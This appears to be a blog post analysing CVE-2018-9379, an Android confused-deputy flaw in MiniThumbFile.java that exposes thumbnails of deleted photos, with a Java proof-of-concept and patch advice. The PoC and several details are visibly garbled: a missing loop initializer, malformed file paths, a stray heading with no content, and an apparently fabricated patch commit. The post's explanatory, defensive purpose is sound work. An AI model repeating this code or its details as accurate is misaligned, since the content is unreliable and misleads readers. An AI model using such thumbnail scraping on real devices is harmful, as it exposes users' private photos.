CVE-2018-9379 - Local Information Disclosure in MiniThumbFile.java Due to Confused Deputy

In this post, we will present a detailed analysis of CVE-2018-9379, a security vulnerability affecting multiple functions of the MiniThumbFile.java class in the Android framework. This vulnerability could allow an attacker to view the thumbnails of deleted photos by exploiting a confused deputy situation, leading to local information disclosure without requiring any additional execution privileges. It is important to note that user interaction is not necessary for the exploitation of this vulnerability.

Original References: Android Security Bulletin - August 2018, CVE-2018-9379 Detail

Vulnerability Details

In Android, the MiniThumbFile.java class is responsible for managing the storage and access to the thumbnail images corresponding to media files (such as photos and videos). These thumbnail images are stored in a separate cache located at /data/system_ce//thumbnails/thumbcache.idx and /data/system_ce//thumbnails/thumbcache..

remove(long id)

By exploiting this vulnerability, an attacker can view the thumbnails of deleted photos. This is possible because of a confused deputy situation where an unauthorized application can request the thumbnail of a deleted photo, and the system will provide it if the thumbnail still exists in the cache.

Proof of Concept (PoC) Code Snippet

The following code snippet shows the basic steps to exploit the CVE-2018-9379 vulnerability in an Android application:

import android.media.MiniThumbFile;
import android.graphics.Bitmap;

public class ExploitCVE20189379 {

    public static void main(String[] args) {
        // Get the singleton instance of MiniThumbFile
        MiniThumbFile thumbFile = MiniThumbFile.instance('/data/system_ce//thumbnails/thumbcache.idx'); 

        // Iterate through possible IDs of deleted photos
        for (long id = ; id < MAX_ID; id++) {
            // Retrieve the thumbnail from the cache using the ID
            Bitmap thumbnail = thumbFile.getMiniThumbFromFile(id);

            // Check if the thumbnail exists
            if (thumbnail != null) {
                // Save the thumbnail to the local storage
                saveThumbnailLocally(thumbnail, id);
            }
        }
    }
}

This proof of concept assumes that an attacker knows the maximum possible ID (MAX_ID) and has access to the /data/system_ce//thumbnails/thumbcache.idx directory.

By running the code snippet in an Android application, an attacker would be able to save local copies of the thumbnails of deleted photos.

Recommendations

To prevent exploitation of this vulnerability, it is recommended to apply the necessary security patches provided by the Android Security Bulletin - August 2018. The following commit provides a patch to address the issue in AOSP:

- Commit 022b3a5 - Prevent confused deputy attacks in MiniThumbFile.java

By properly validating the access requests made by applications to the thumbnail cache, Android can prevent unauthorized access to the thumbnail images of deleted photos.

Summary

CVE-2018-9379 exposes a vulnerable portion of Android's code that allows potential attackers to view the thumbnails of deleted photos without the user's knowledge. With no additional execution privileges needed, this vulnerability could result in local information disclosure. We strongly recommend updating your Android system with the appropriate security patches to rectify this issue.

Timeline

Published on: 01/17/2025 23:15:11 UTC
Last modified on: 03/13/2025 20:15:13 UTC